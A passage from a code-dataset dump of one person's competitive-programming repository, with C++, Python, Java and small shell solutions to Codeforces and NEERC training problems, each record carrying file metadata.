readln(a)\n#define wr(args...) err(#args, args)\n\n#define ttt12i template<class T1, class T2> inline\n#define tthti template<class H, class...T> inline\n#define ttta template<class... Args> inline\n#define ttti template<class T> inline\n\nconst int MOD = 1000000007;\nconst int INTMAX = numeric_limits<int>::max();\nconst ll LLMAX = numeric_limits<ll>::max();\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\nttta void readln(Args&... args){(read(args),...);}tthti void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\nttti void writeln_range(T f,T s){if(f!=s)for(auto i=f;i!=s;++i)writeln(*i);}\nvector<string>split(string&s,string d){vector<string>v;size_t p=0;while((p=s.find(d))!=string::npos)v.pb(s.substr(0,p)),s.erase(0,p+d.length());v.pb(s);return v;}\nttta void err(string v,Args...args){auto vv=split(v,\", \");auto it=vv.begin();(writeln(*it++,\"=\",args),...);}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n, m);\n vector<vector<int>> c(n, vi(n + n + 1));\n int s = 0;\n int cnt = min(n, m);\n {\n vector<vector<int>> a(n, vi(m));\n readln(a);\n vector<pii> columns;\n forj(m)\n {\n int s = 0;\n fori(n)\n s = max(s, a[i][j]);\n columns.pb({s, j});\n }\n sort(columns.rbegin(), columns.rend());\n forj(cnt)\n fori(n)\n c[j][i] = c[j][i + n] = a[i][columns[j].second];\n fori(n) s += c[0][i];\n }\n\n function<int(vector<int>&, int, int)> get = [&](vector<int>& state, int sum, int index) {\n if (index == cnt) return sum;\n int mx = sum;\n fori(n)\n {\n vector<int> diff(n, 0);\n int curSum = sum;\n forj(n)\n if (int curIndex = i + j, elem = c[index][curIndex]; state[j] < elem)\n {\n diff[j] = elem - state[j];\n state[j] += diff[j];\n curSum += diff[j];\n }\n if (curSum > sum)\n mx = max(mx, get(state, curSum, index + 1));\n forj(n)\n state[j] -= diff[j];\n }\n return mx;\n };\n\n writeln(get(c[0], s, 1));\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n ints(t);\n fori(t)\n run();\n cerr << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttti ostream&operator<<(ostream&os,vector<T>const&a);\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttti ostream&operator<<(ostream&os,vector<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti ostream&operator<<(ostream&os,valarray<T>const&a){if(a.size())os<<a[0];else os<<\"\\n\";fori1(a.size())os<<\"\\n \"[is_fundamental<T>::value]<<a[i];return os;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti istream&operator>>(istream&is,valarray<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4806995093822479, "alphanum_fraction": 0.5015994906425476, "avg_line_length": 31.5625, "blob_id": "839ab6bff054254ab4069dba2c4551d7dfc91685", "content_id": "6bd1ca3a32efb3a45b86e070c6ab833d44050ea1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 4689, "license_type": "no_license", "max_line_length": 174, "num_lines": 144, "path": "/CodeForce/1833/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n#ifdef ONLINE_JUDGE\n#pragma GCC target(\"avx2,bmi,bmi2,lzcnt,popcnt\")\n#endif\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\nvoid run()\n{\n ints(n);\n vector<set<pii>> g(n);\n fori(n - 1)\n {\n ints(u, v); --u; --v;\n g[u].insert({v, i});\n g[v].insert({u, i});\n }\n if (n % 3 != 0)\n return writeln(-1);\n set<int> ans;\n vector d(n, MOD);\n vector up(n, pair(-1, -1));\n d[0] = 0;\n auto dfs = [&](auto dfs, int u, int p) -> void {\n for (const auto& [v, _]: g[u])\n if (v != p)\n d[v] = d[u] + 1,\n up[v] = {u, _},\n dfs(dfs, v, u);\n };\n dfs(dfs, 0, -1);\n set<pii> order;\n fori(n)\n order.insert({-d[i], i});\n\n auto eraseVertex = [&](int u) {\n //writeln(\"ERASE VERTEX\", u + 1); cout.flush();\n order.erase({-d[u], u});\n };\n\n auto eraseEdge = [&](int u, int v, int e) {\n //writeln(\"ERASE EDGE\", u + 1, v + 1); cout.flush();\n ans.insert(e + 1);\n g[u].erase({v, e});\n g[v].erase({u, e});\n //writeln(\"ERASED EDGE\", u + 1, v + 1); cout.flush();\n };\n\n while (order.size())\n {\n auto [_, u] = *order.begin();\n //writeln(\"GO\", u + 1);\n eraseVertex(u);\n auto [v, __] = up[u];\n if (v == -1)\n return writeln(-1);\n if (g[v].size() == 1)\n return writeln(-1);\n if (g[v].size() >= 4)\n return writeln(-1);\n eraseVertex(v);\n int downVertex = -1;\n int downEdge = -1;\n for (auto& [dv, de]: g[v])\n if (dv != u && dv != up[v].first)\n downVertex = dv,\n downEdge = de;\n if (downVertex != -1)\n {\n eraseVertex(downVertex);\n //writeln(\"ERASE CHILD\", u + 1, v + 1, downVertex + 1); cout.flush();\n if (up[v].first != -1)\n eraseEdge(v, up[v].first, up[v].second);\n }\n else\n {\n //writeln(\"ERASE ROOT\", u + 1, v + 1, up[v].first + 1); cout.flush();\n u = v;\n v = up[v].first;\n if (v == -1)\n return writeln(-1);\n eraseVertex(v);\n auto ccc(g[v]);\n for (auto& [dv, de]: ccc)\n if (dv != u)\n eraseEdge(v, dv, de);\n //writeln(\"ERASED ROOT\", u + 1, v + 1, up[v].first + 1); cout.flush();\n }\n }\n writeln(ans.size());\n writeln(ans);\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false); cin.tie(0);\n ints(t); fori(t) run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\"\\n \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.4457831382751465, "alphanum_fraction": 0.4939759075641632, "avg_line_length": 40, "blob_id": "fbd25ea62191fe5a12f9391fadba040dea9e22c0", "content_id": "e2fdc6e157932f3549adbca56fe54a2e0f7c0180", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 83, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/CodeForce/0952/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "y='..\\nX.\\n..\\n'\nprint(''.join(y*(255-ord(x))+'X.\\n'*2+y*ord(x)for x in input()))\n\n" }, { "alpha_fraction": 0.4966442883014679, "alphanum_fraction": 0.5302013158798218, "avg_line_length": 48.66666793823242, "blob_id": "17830eeb8a0a0cd8f659326757063e04b799a72b", "content_id": "25cd71207496df4296268dc7ab50f7142afd1200", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 149, "license_type": "no_license", "max_line_length": 67, "num_lines": 3, "path": "/CodeForce/0534/B.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "v1, v2 = list(map(int, input().split()))\nt, d = list(map(int, input().split()))\nprint(sum(min(v1 + d * i, v2 + d * (t - i - 1)) for i in range(t)))\n" }, { "alpha_fraction": 0.5388429760932922, "alphanum_fraction": 0.5462809801101685, "avg_line_length": 27.13953399658203, "blob_id": "a77f2d3d9eaee18452aa0069911de975f8c4364a", "content_id": "70ad7bf2a3c77fd9d6e9210c9aa22472e543b93f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1210, "license_type": "no_license", "max_line_length": 97, "num_lines": 43, "path": "/CodeForce/gym/101585/G.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "import re\n\ndef trimSpaces(ss):\n return re.sub('^\\s*(.*?)\\s*$', r'\\1', ss)\n\ndef filterEmpty(l):\n return list(filter(lambda x: len(x) != 0, l))\n\ntext = input()\nq = int(input())\n\nsequences = re.sub(r'\\.(\\s*?[A-Z0-9.!?])', r'.#\\1', text);\nsequences = re.sub(r'\\.(\\s*?[A-Z0-9.!?])', r'.#\\1', sequences);\n# print(sequences)\nsequences = re.sub('([!?])', r'\\1#', sequences)\nsequences = sequences.split('#')\nsequences = filterEmpty(sequences)\nsequencesLower = list(map(lambda x: filterEmpty(re.split('[.!? ]', x.lower())), sequences))\n# print(sequences)\n\n\n\ndef connn(what):\n ret = []\n for i in range(len(sequencesLower)):\n ok = True\n for j in range(len(what)):\n #print('SEARCHING %s in %s %s' % (what[j], sequences[i], sequences[i].find(what[j])))\n if not what[j] in sequencesLower[i]:\n ok = False\n break\n if ok:\n ret.append(sequences[i])\n return ret\n\nfor i in range(q):\n ss = input()\n search = filterEmpty(re.split('\\s', ss.lower()))\n results = connn(search)\n\n print('Search results for \"%s\":' % ss)\n if len(results):\n print(\"- %s\" % \"\\n- \".join(map(lambda x: '\"%s\"' % (trimSpaces(x)), results)))\n" }, { "alpha_fraction": 0.432218462228775, "alphanum_fraction": 0.4511229693889618, "avg_line_length": 27.00452423095703, "blob_id": "a0ed8ee91a2126658dd0e65981c94a8a4fce2a3d", "content_id": "8e9369be97a2638c6ca1d0ddc0f9d3b60c09ed45", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 6189, "license_type": "no_license", "max_line_length": 173, "num_lines": 221, "path": "/CodeForce/1531/D.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "// Igorjan94, template version from 13 October 2017. C++17 version, modified 18 march 2020 (writeln<tuple>, whole->all) {{{\n#include <bits/stdc++.h>\n\nusing namespace std;\n\n#define FOR(i, m, n) for (int i = m; i < (int) (n); ++i)\n#define ROF(i, m, n) for (int i = m; i >= (int) (n); --i)\n#define forn(i, n) for (int i = 0; i < (int) (n); ++i)\n#define fori1(n) for (int i = 1; i < (int) (n); ++i)\n#define forj1(n) for (int j = 1; j < (int) (n); ++j)\n#define fori(n) for (int i = 0; i < (int) (n); ++i)\n#define forj(n) for (int j = 0; j < (int) (n); ++j)\n#define SZ(a) int(size(a))\n\ntypedef pair<int, int> pii;\ntypedef vector<int> vi;\ntypedef long long ll;\n\n#define pb push_back\n#define all(a) begin(a), end(a)\n#define ints(a...) int a; readln(a)\n\n[[maybe_unused]] const int MOD = 1000000007;\n[[maybe_unused]] const int INTMAX = numeric_limits<int>::max();\n\n#define ttt12i template<class T1, class T2> inline\n#define ttti template<class T> inline\n\nvoid writeln(){cout<<\"\\n\";}ttti void print(T&& a);ttti void priws(T&& a);ttti void read(T& a);\ntemplate<class... Args> inline void readln(Args&... args){(read(args),...);}\ntemplate<class H, class...T> inline void writeln(H&& h,T&&...t){priws(h);(print(t),...);writeln();}\n\n//Igorjan\n//}}}\n\n//segmentTree\n//0-indexed, [l..r]\ntemplate<typename T>\nstruct segmentTree\n{\n int n;\n vector<T> t;\n vector<T> add;\n vector<T> pos;\n \n void build(const vector<T>& a, int v, int l, int r)\n {\n if (l == r)\n t[v] = a[l],\n pos[v] = l;\n else \n {\n int m = (l + r) / 2;\n build(a, v * 2, l, m);\n build(a, v * 2 + 1, m + 1, r);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n if (left > right)\n pos[v] = pos[v * 2];\n else\n pos[v] = pos[v * 2 + 1];\n t[v] = max(left, right);\n }\n };\n \n segmentTree(const vector<T>& a)\n {\n n = a.size();\n t.resize(n * 4 + 10);\n add.resize(n * 4 + 10, 0);\n pos.resize(n * 4 + 10, 0);\n build(a, 1, 0, n - 1);\n }\n \n void update(int l, int r, T value)\n {\n //writeln(\"ADDING\", l, r, value);\n update(1, 0, n - 1, l, r, value);\n }\n \n void update(int v, int tl, int tr, int l, int r, T value) \n {\n if (add[v] != 0)\n {\n t[v] += add[v];\n if (tl != tr)\n add[v * 2] += add[v],\n add[v * 2 + 1] += add[v];\n add[v] = 0;\n }\n if (l > r)\n return;\n if (tl == l && tr == r)\n {\n t[v] += value;\n if (tl != tr)\n add[v * 2] += value,\n add[v * 2 + 1] += value;\n }\n else \n {\n int tm = (tl + tr) / 2;\n update(v * 2, tl, tm, l, min(r, tm), value);\n update(v * 2 + 1, tm + 1, tr, max(l, tm + 1), r, value);\n T left = t[v * 2];\n T right = t[v * 2 + 1];\n\n if (left > right)\n pos[v] = pos[v * 2];\n else\n pos[v] = pos[v * 2 + 1];\n t[v] = max(left, right);\n }\n }\n};\n\nvoid run()\n{\n ints(n);\n vector<string> s(n);\n readln(s);\n s.insert(s.begin(), \"blue\");\n s.pb(\"lock\");\n s.pb(\"unlock\");\n s.pb(\"lock\");\n s.pb(\"unlock\");\n n = SZ(s);\n ints(q);\n\n set<int> locks, unlocks;\n vector<int> a(n, 0);\n segmentTree<int> tree(a);\n\n auto addString = [&](int i) {\n if (s[i] == \"lock\")\n locks.insert(i);\n else if (s[i] == \"unlock\")\n unlocks.insert(i);\n };\n auto getUnlock = [&](int l) {\n return min(*unlocks.lower_bound(l), *locks.upper_bound(l));\n };\n auto updatePos = [&](int i, int diff, bool rec) {\n auto l = locks.upper_bound(i);\n if (l != locks.begin())\n {\n --l;\n int u = getUnlock(*l);\n if (u < i) return;\n tree.update(*l, u, diff);\n if (l != locks.begin() && rec)\n {\n --l;\n int u = getUnlock(*l);\n if (u < i) return;\n tree.update(*l, u, diff);\n }\n }\n };\n fori(n)\n addString(i);\n\n for (int u: unlocks)\n tree.update(u, u, -1);\n for (int l: locks)\n {\n tree.update(l, l, -1);\n int u = getUnlock(l);\n tree.update(l, u, -1);\n }\n writeln(s[tree.pos[1]]);\n\n forn(w, q)\n {\n int i;\n string t;\n readln(i, t);\n //writeln(s);\n if (s[i] != t)\n {\n if (s[i] == \"unlock\" || s[i] == \"lock\")\n tree.update(i, i, 1),\n updatePos(i, 1, s[i] == \"lock\"),\n (s[i] == \"lock\" ? locks : unlocks).erase(i),\n updatePos(i, -1, false);\n\n s[i] = t;\n\n if (s[i] == \"lock\" || s[i] == \"unlock\")\n updatePos(i, 1, false),\n (s[i] == \"lock\" ? locks : unlocks).insert(i),\n updatePos(i, -1, s[i] == \"lock\"),\n tree.update(i, i, -1);\n }\n //writeln(s);\n writeln(s[tree.pos[1]]);\n //writeln();\n }\n}\n\n//{{{\nint main()\n{\n ios_base::sync_with_stdio(false);\n run();\n cerr << fixed << setprecision(0) << \"Execution time = \" << 1000.0 * clock() / CLOCKS_PER_SEC << \"ms\\n\";\n return 0;\n}\n\n#define a _a\n#define n _n\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a);\ntemplate<typename T,typename D=decltype(*begin(declval<T>())),typename enable_if<!is_same<T,basic_string<char>>::value>::type* =nullptr>\nostream&operator<<(ostream&os,T const&a){auto it=begin(a);if(it!=end(a))os<<*it++;while(it!=end(a))os<<\" \"[is_fundamental<typename T::value_type>::value]<<*it++;return os;}\nttt12i ostream&operator<<(ostream&os,pair<T1,T2>const&a){return os<<a.first<<\" \"<<a.second;}\nttt12i istream&operator>>(istream&is,pair<T1,T2>&a){return is>>a.first>>a.second;}\nttti istream&operator>>(istream&is,vector<T>&a){fori(a.size())is>>a[i];return is;}\nttti void print(T&&a){cout<<\" \"<<a;}\nttti void priws(T&&a){cout<<a;}\nttti void read(T&a){cin>>a;} //}}}\n" }, { "alpha_fraction": 0.2744479477405548, "alphanum_fraction": 0.27917981147766113, "avg_line_length": 15.6578950881958, "blob_id": "94161831f4f3fdd6b2782b4cd8e7f8f0e4430198", "content_id": "27fe355e5857f2bdd960941949a45f78661f86b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 680, "license_type": "no_license", "max_line_length": 32, "num_lines": 38, "path": "/2023/tin/2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "\n# python 3.10\n\nm = {\n 'РҐ': 'Х',\n 'Рѕ': 'а',\n 'С‰': 'к',\n 'Сѓ': 'е',\n 'СЏ': 'р',\n 'СЋ': 'п',\n 'СЉ': 'л',\n 'РЅ': 'я',\n 'Р¶': 'ш',\n 'Р±': 'т',\n 'С‘': 'ч',\n 'С€': 'й',\n 'СЊ': 'н',\n 'С‡': 'и'\n}\n\ndef decrypt(text: str) -> str:\n l = len(text)\n ret = ''\n p = ''\n for i in range(l):\n c = text[i]\n if c in [' ', ',', '.']:\n ret += c\n else:\n if p == '':\n p = c\n else:\n ret += m[p + c]\n p = ''\n return ret\n\nif __name__ == \"__main__\":\n input_str = input()\n print(decrypt(input_str))\n" }, { "alpha_fraction": 0.5223880410194397, "alphanum_fraction": 0.5223880410194397, "avg_line_length": 12, "blob_id": "df1dba4810ddeb404a1f3f80e63da6b8161d0b1d", "content_id": "fbe50dd5f1e4f3081d1440d6500fd61ad898c83e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 67, "license_type": "no_license", "max_line_length": 12, "num_lines": 5, "path": "/CodeForce/clear.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mv E/E.cpp .\nmv D/D.cpp .\nmv C/C.cpp .\nmv B/B.cpp .\nmv A/A.cpp .\n\n\n" }, { "alpha_fraction": 0.3454987704753876, "alphanum_fraction": 0.3540146052837372, "avg_line_length": 19.073171615600586, "blob_id": "1e9e7b6c4fc9725e438627cd19645975b823f8a0", "content_id": "e6478947d0f6931eb2d2e548c517ac676afb7e50", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 822, "license_type": "no_license", "max_line_length": 54, "num_lines": 41, "path": "/trains/neerc/neerc.ifmo.ru.train.2014.10.25/I.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <bits/stdc++.h>\n \n#define fori(n) for (int i = 0; i < n; ++i)\n#define fori1(n) for (int i = 1; i < n; ++i)\n#define forj(n) for (int j = 0; j < n; ++j)\n \n#define fst first\n#define snd second\n#define pb push_back\n \nusing namespace std;\n \nint main()\n{\n //freopen(\"in.c\", \"r\", stdin);\n int n, m;\n while (true)\n {\n cin >> n >> m;\n if (n + m == 0)\n return 0;\n vector<pair<int, int> > a;\n int x, y;\n fori(n)\n {\n cin >> x >> y;\n cin >> x >> y;\n a.pb({x, x + y});\n }\n fori(m)\n {\n cin >> x >> y;\n y += x;\n int ans = 0;\n fori(n)\n if (!(a[i].fst >= y || a[i].snd <= x))\n ans++;\n cout << ans << \"\\n\";\n }\n }\n}" }, { "alpha_fraction": 0.5063807964324951, "alphanum_fraction": 0.5165901184082031, "avg_line_length": 31.649999618530273, "blob_id": "de76b5a1ef4d8b859aaf0fb7c899ccff8547d367", "content_id": "8c78ccbd83ac7a78cf398e7995e9bc28fddd8583", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1959, "license_type": "no_license", "max_line_length": 928, "num_lines": 60, "path": "/trains/neerc/neerc.ifmo.ru.train.2013.09.24/H.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <cstdlib>\n#include <iostream>\n#include <stdio.h>\n#include <vector>\n#include <set>\n#include <algorithm>\n#include <map>\n#include <queue>\n#define enter printf(\"\\n\");\n#define pb push_back\n\nusing namespace std;\nint INF = 1000000007;\nvector< vector<int> > a;\nvector<int> used;\nstring FILENAME = \"dragon\";\nstring FILEINPUT = FILENAME;\n\nvoid writeln(int a){printf(\"%d\\n\", a);}void writeln(int a, int b){printf(\"%d %d\\n\", a, b);}void writeln(int a, int b, int c){printf(\"%d %d %d\\n\", a, b, c);}void writeln(int a, int b, int c, int d){printf(\"%d %d %d %d\\n\", a, b, c, d);}void write(int a){printf(\"%d\", a);}void write(int a, int b){printf(\"%d %d\", a, b);}void write(int a, int b, int c){printf(\"%d %d %d\", a, b, c);}void write(int a, int b, int c, int d){printf(\"%d %d %d %d\", a, b, c, d);}void read(int &a){scanf(\"%d\", &a);}void read(int &a, int &b){scanf(\"%d %d\", &a, &b);}void read(int &a, int &b, int &c){scanf(\"%d %d %d\", &a, &b, &c);}void read(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\", &a, &b, &c, &d);}void readln(int &a){scanf(\"%d\\n\", &a);}void readln(int &a, int &b){scanf(\"%d %d\\n\", &a, &b);}void readln(int &a, int &b, int &c){scanf(\"%d %d %d\\n\", &a, &b, &c);}void readln(int &a, int &b, int &c, int &d){scanf(\"%d %d %d %d\\n\", &a, &b, &c, &d);}\n\nvoid readln(vector<int> &f, int n)\n{\n int x;\n for (int i = 1; i <= n; i++)\n {\n read(x);\n f.push_back(x);\n }\n}\n\nvoid writeln(vector<int> &f)\n{\n for (int i = 0; i < f.size(); i++)\n printf(\"%d%c\", f[i], i == f.size() - 1 ? '\\n' : ' ');\n}\n\nvoid run()\n{\n int n, d;\n readln(n, d);\n int k = 0, m = d;\n while (m > 0)\n k++,\n m /= 10;\n if (k > n)\n printf(\"No solution\\n\"); else\n {\n write(d);\n for (int i = 0; i < n - k; i++)\n printf(\"0\");\n }\n}\n\nint main()\n{\n freopen(FILEINPUT.append(\".in\").c_str(), \"r\", stdin);\n freopen(FILENAME.append(\".out\").c_str(), \"w\", stdout);\n run();\n return 0;\n}\n" }, { "alpha_fraction": 0.3315926790237427, "alphanum_fraction": 0.3864229619503021, "avg_line_length": 18.100000381469727, "blob_id": "3bcd75cb1becc6eb2498e49d9530560d43ebc68e", "content_id": "c12dc99c4e771a8a6564e6c372ce5af1d39d4645", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 383, "license_type": "no_license", "max_line_length": 39, "num_lines": 20, "path": "/CodeForce/0411/allLanguages/python2.py", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\na = raw_input()\nok = 0\nok1 = 0\nok2 = 0\nok3 = 0\na = list(a)\nif (len(a) >= 5):\n ok = 1\nfor i in range(len(a)):\n if ((a[i] >= 'a') & (a[i] <= 'z')):\n ok1 = 1\n if ((a[i] >= 'A') & (a[i] <= 'Z')):\n ok2 = 1\n if ((a[i] >= '0') & (a[i] <= '9')):\n ok3 = 1\nif (ok + ok1 + ok2 + ok3 == 4):\n print \"Correct\"\nelse:\n print \"Too weak\" \n" }, { "alpha_fraction": 0.29443690180778503, "alphanum_fraction": 0.3043871521949768, "avg_line_length": 17.40350914001465, "blob_id": "29e2cc265f5108291bd97d6b483ee9d939a24675", "content_id": "8ca5690fae5f83cc062d69c3e5fc9433a66773d3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2938, "license_type": "no_license", "max_line_length": 60, "num_lines": 114, "path": "/trains/neerc/neerc.ifmo.ru.train.2015.10.20/G.cpp", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "#include <iostream>\r\n#include <cstdio>\r\n#include <bits/stdc++.h>\r\n \r\nusing namespace std;\r\n \r\nint main()\r\n{\r\n    int n, m, k = 10001;\r\n    scanf(\"%d\", &n);\r\n \r\n    vector<pair<int,int>> g;\r\n \r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        int x, y;\r\n        scanf(\"%d%d\", &x, &y);\r\n        g.push_back({x, y});\r\n    }\r\n \r\n \r\n    vector<vector<pair<double, double>>> s(k);\r\n    vector<vector<pair<double, double>>> t(k);\r\n \r\n    double eps = 1e-9;\r\n    scanf(\"%d\", &m);\r\n \r\n    for (int i = 0; i < m; i++)\r\n    {\r\n        int x, y, r;\r\n        scanf(\"%d%d%d\", &x, &y, &r);\r\n \r\n        int u = min(y + r, k - 1);\r\n        int d = max(y - r, 0);\r\n \r\n        for (int j = d; j <= u; j++)\r\n        {\r\n            int dy = j - y;\r\n            double dr = sqrt(r * r - dy * dy) + eps;\r\n            s[j].push_back({x - dr, x + dr});\r\n        }\r\n    }\r\n    for (int y = 0; y < k; y++)\r\n    {\r\n        sort(s[y].begin(), s[y].end());\r\n \r\n        double curL = -2, curR = -1;\r\n \r\n        for (auto &seg : s[y])\r\n        {\r\n            if (curR < seg.first)\r\n            {\r\n                t[y].push_back({curL, curR});\r\n                curL = seg.first;\r\n                curR = seg.second;\r\n            }\r\n            else\r\n            {\r\n                curR = max(curR, seg.second);\r\n            }\r\n        }\r\n        t[y].push_back({curL, curR});\r\n    }\r\n \r\n    int ans = n;\r\n    for (int i = 0; i < n; i++)\r\n    {\r\n        int x = g[i].first, y = g[i].second;\r\n        int len = t[y].size();\r\n        int l = 0, r = len - 1;\r\n \r\n        while (r - l > 1)\r\n        {\r\n            int mid = (r + l) / 2;\r\n \r\n            if (t[y][mid].first < x)\r\n            {\r\n                l = mid;\r\n            }\r\n            else\r\n            {\r\n                r = mid;\r\n            }\r\n        }\r\n \r\n \r\n        l -= 2;\r\n        r += 2;\r\n \r\n        bool ok = false;\r\n \r\n        for (int j = l; j <= r; j++)\r\n        {\r\n            if (0 <= j && j < len)\r\n            {\r\n                pair<double, double> seg = t[y][j];\r\n                ok |= (seg.first <= x) && (x <= seg.second);\r\n            }\r\n \r\n        }\r\n \r\n        if (ok)\r\n        {\r\n            --ans;\r\n        }\r\n \r\n    }\r\n \r\n \r\n \r\n \r\n \r\n    printf(\"%d\\n\", ans);\r\n}\n" }, { "alpha_fraction": 0.6057906746864319, "alphanum_fraction": 0.62806236743927, "avg_line_length": 25.212121963500977, "blob_id": "7042dfc4496e699bcbcdbcba0a28612ad8fca7c0", "content_id": "17da4f89adc0d890fd7e3f831955eec00822db62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 898, "license_type": "no_license", "max_line_length": 77, "num_lines": 33, "path": "/study/task7/SimViz.java", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "package task7;\r\n\r\nimport java.awt.image.BufferedImage;\r\n\r\nimport javax.swing.ImageIcon;\r\nimport javax.swing.JFrame;\r\nimport javax.swing.JLabel;\r\nimport javax.swing.JPanel;\r\n\r\npublic class SimViz extends JFrame {\r\n\tpublic SimViz(int scale, Digit digit) {\r\n\t\tint m = scale * digit.len;\r\n\t\tBufferedImage canvas = new BufferedImage(m, m, BufferedImage.TYPE_INT_RGB);\r\n\t\tJLabel label = new JLabel();\r\n\t\tlabel.setIcon(new ImageIcon(canvas));\r\n\t\tJPanel mainPanel = new JPanel();\r\n\t\tmainPanel.add(label);\r\n\t\tadd(mainPanel);\r\n\t\tsetBounds(42, 42, m + 42, m + 42);\r\n\t\tfor (int y = 0; y < m; y++) {\r\n\t\t\tfor (int x = 0; x < m; x++) {\r\n\t\t\t\tint grey = (int) Math.round(digit.getSignal(x / scale, y / scale) * 255);\r\n\t\t\t\tcanvas.setRGB(x, y, (grey << 16) | (grey << 8) | (grey << 0));\r\n\t\t\t}\r\n\t\t}\r\n\r\n\t\tsetTitle(\"Digit = \" + digit.label);\r\n\r\n\t\trepaint();\r\n\t}\r\n\r\n\tprivate static final long serialVersionUID = 10L;\r\n}\r\n" }, { "alpha_fraction": 0.635869562625885, "alphanum_fraction": 0.72826087474823, "avg_line_length": 25.285715103149414, "blob_id": "9c59acbab35370c85a13a71681fcf731a5d29d7f", "content_id": "0fbebe6bd6bbe2b5895aec37fdcd19d631943365", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 184, "license_type": "no_license", "max_line_length": 32, "num_lines": 7, "path": "/staff/makeCfRound.sh", "repo_name": "Igorjan94/CF", "src_encoding": "UTF-8", "text": "mkdir \"$1\"\ncd \"$1\"\ncp 